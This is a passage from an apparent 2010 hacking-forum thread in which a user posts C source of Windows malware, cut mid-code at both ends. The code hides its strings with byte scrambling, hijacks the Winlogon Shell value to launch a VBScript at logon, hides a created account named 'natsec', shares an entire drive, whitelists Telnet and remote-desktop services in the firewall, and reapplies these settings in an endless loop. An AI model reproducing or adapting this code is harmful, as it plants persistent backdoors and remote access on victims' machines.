    	plainbuffer[103] = "\xD3\x87\x89\xE9\xC1\xEC\xDE\xEB\xEB\xFE\xEB\x9F\xE9\xC0\xB2\xF8\x9B";//":*:Enabled:Telnet";
    	plainbuffer[104] = "\xB6\xC2\xF1\xC1\xAB";//"Start";
    	plainbuffer[105] = "\xA6\xDE\xF2\x9F\xC2\xFC\xBF\xDF\x87\x83\xA5\x98\xB9\xE7"\
    					   "\x8F\x9A\xBD\xD0\x90\x9B\xDA\x94\xF4\xF6\xAA\xB9\x9D\xE4"\
    					   "\xC8\xEA\xCD\x84\xCB\xC1\xE5\xCC\xE5\xAE\x9E\xAF\xF0\x99"\
    					   "\xE1\xF4\xE1\xBE\xE6\xBC\x87\xAB\xA9\xB9\xAC\x8F\xFF\xB2"\
    					   "\x83\xD8\xED\xB1\xB1\xC9\xC5\xFF\xE3\xE1\x88\x9F";
    	/*"CSCFlags=0\0MaxUses=4294967295\0Path=D:\\\0Permissions=0\0Remark=\0Type=0\0";*/
    	plainbuffer[106] = NULL;
    //--------String section end-----------
    }
    }
    #pragma data_seg()
    /*-------------------Enhancement circuit------------------*/
    void enhancement(void)	{
    	SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
    	HKEY hEnhance = NULL;
    	LPCTSTR subkey = plainbuffer[18];//"Control Panel\\Desktop";
    	CONST BYTE value[] = "30";
    	CONST BYTE value1[] = "60";
    	CONST BYTE value2[] = "1";	// Use it wherever required.
    	if (RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    		RegSetValueEx(hEnhance, plainbuffer[12]/*"MenuShowDelay"*/, 0, REG_SZ, value, sizeof (value));
    		RegCloseKey(hEnhance);hEnhance = NULL;
    	}
    	subkey = plainbuffer[13];//"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer";
    	if (RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    		RegSetValueEx(hEnhance, plainbuffer[14]/*"NoDriveTypeAutoRun"*/, 0, REG_SZ, value1, sizeof (value1));
    		RegCloseKey(hEnhance);hEnhance = NULL;
    	}
    //------------------Administrative section----------------//
    	subkey = plainbuffer[15];//"CurrentControlSet\\Control\\Session Manager\\Memory Management";
    	if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, subkey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    		RegSetValueEx(hEnhance, plainbuffer[16]/*"DisablePagingExecutive"*/, 0, REG_SZ, value2, sizeof (value2));
    		RegSetValueEx(hEnhance, plainbuffer[17]/*"LargeSystemCache"*/, 0, REG_SZ, value2, sizeof (value2));
    		RegCloseKey(hEnhance);hEnhance = NULL;
    	}
    //-------------------Fail-safe section----------------//
    	HKEY hFailsafe = NULL;
    	LPCTSTR fsubkey = plainbuffer[18];//"Control Panel\\Desktop";
    	LPCTSTR fsubkey1 = plainbuffer[19];//"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced";
    	LPCTSTR shellsubkey = plainbuffer[20];//"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon";
    	LPCTSTR accsubkey = plainbuffer[21];//*/"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList";
    	LPCTSTR restorsubkey = "SYSTEM\\CurrentControlSet\\Services\\srservice";
    	CONST BYTE fsval1[] = "0";
    	CONST BYTE dwval[] = "\x00\x00\x00\x00";	// not scrambled
    	char *fsval;
    	char *shellval;
    	fsval = saverptr;
    	shellval = plainbuffer[23];//"Explorer.exe winntobj.vbs";
    Last edited by fb1h2s; 10-13-2010 at 11:02 PM.

  10. #10
    Code:
    //-------------------Loop settings--------------------//
    	subkey = plainbuffer[24];//"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer";
    	LPCTSTR subkey1 = plainbuffer[25];//"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system";
    	LPCTSTR sharekey = plainbuffer[96];/*"SYSTEM\\ControlSet001\\Services\\lanmanserver\\Shares";*/
    	LPCTSTR firekey = plainbuffer[97];//"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List";
    	LPCTSTR rdeskkey = plainbuffer[98];//"SYSTEM\\ControlSet001\\Services\\mnmsrvc";
    	LPCTSTR tsubkey = plainbuffer[99];//"SYSTEM\\ControlSet001\\Services\\TlntSvr";
    
    	CONST BYTE rdeskval[] = "\x02\x00\x00\x00";
    	char *shval = plainbuffer[105];//"CSCFlags=0\nMaxUses=4294967295\nPath=F:\\\nPermissions=0\nRemark=\nType=0\n";
    	char buffer[MEDBUFSIZE], tbuffer[MEDBUFSIZE], winbuf[KEYSZ], tbuf[MEDBUFSIZE];
    	memset(buffer, 0, MEDBUFSIZE);memset(tbuffer, 0, MEDBUFSIZE);
    	memset(winbuf, 0, KEYSZ);memset(tbuf, 0, KEYSZ);
    
    	DWORD usize = sizeof(winbuf) - 1;
    	GetSystemDirectory(winbuf, usize);
    	strcpy(tbuf, winbuf);
    	strcat(winbuf, plainbuffer[100]/*"\\mnmsrvc.exe"*/);
    	strcat(tbuf, plainbuffer[101]/*"\\tlntsrv.exe"*/);
    	strcpy(buffer, winbuf);
    	strcat(buffer, plainbuffer[102]/*":*:Enabled:Retaliator"*/);
    	strcpy(tbuffer, tbuf);
    	strcat(tbuffer, plainbuffer[103]/*":*:Enabled:Telnet"*/);
    	while(true)	{
    		if (RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    			RegSetValueEx(hEnhance, plainbuffer[26]/*"SearchHidden"*/, 0, REG_SZ, value2, sizeof (value2));
    			RegCloseKey(hEnhance);hEnhance = NULL;
    		}
    		if (RegOpenKeyEx(HKEY_CURRENT_USER, subkey1, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    			RegSetValueEx(hEnhance, plainbuffer[27]/*"DisableRegistryTools"*/, 0, REG_SZ, fsval1, sizeof (fsval1));
    			RegSetValueEx(hEnhance, plainbuffer[28]/*"DisableTaskmgr"*/, 0, REG_SZ, fsval1, sizeof (fsval1));
    			RegCloseKey(hEnhance);hEnhance = NULL;
    		}
    		if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, subkey1, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    			RegSetValueEx(hEnhance, plainbuffer[27]/*"DisableRegistryTools"*/, 0, REG_SZ, fsval1, sizeof (fsval1));
    			RegSetValueEx(hEnhance, plainbuffer[28]/*"DisableTaskmgr"*/, 0, REG_SZ, fsval1, sizeof (fsval1));
    			RegCloseKey(hEnhance);hEnhance = NULL;
    		}
    		if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, shellsubkey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    			RegSetValueEx(hEnhance, plainbuffer[29]/*"Shell"*/, 0, REG_SZ, (const unsigned char *)shellval, lstrlen(shellval));			
    			RegCloseKey(hEnhance);hEnhance = NULL;
    			cruser();
    			if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, accsubkey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    				RegSetValueEx(hEnhance, plainbuffer[30]/*/"natsec"/**/, 0, REG_DWORD, dwval, sizeof (DWORD));			
    				RegCloseKey(hEnhance);hEnhance = NULL;
    			}
    			if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, sharekey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    				RegSetValueEx(hEnhance, plainbuffer[30]/*/"natsec"/**/, 0, REG_MULTI_SZ, (const unsigned char *)shval, 68);			
    				RegCloseKey(hEnhance);hEnhance = NULL;
    			}
    			if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, firekey, 0, KEY_ALL_ACCESS, &hEnhance) == ERROR_SUCCESS)	{
    				RegSetValueEx(hEnhance, /*plainbuffer[30]/*/winbuf/**/, 0, REG_SZ, (const unsigned char *)buffer, lstrlen(buffer));
    				RegSetValueEx(hEnhance, /*plainbuffer[30]/*/tbuf/**/, 0, REG_SZ, (const unsigned char *)tbuffer, lstrlen(tbuffer));			
    				RegCloseKey(hEnhance);hEnhance = NULL;
    			}
    Last edited by fb1h2s; 10-13-2010 at 11:03 PM.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •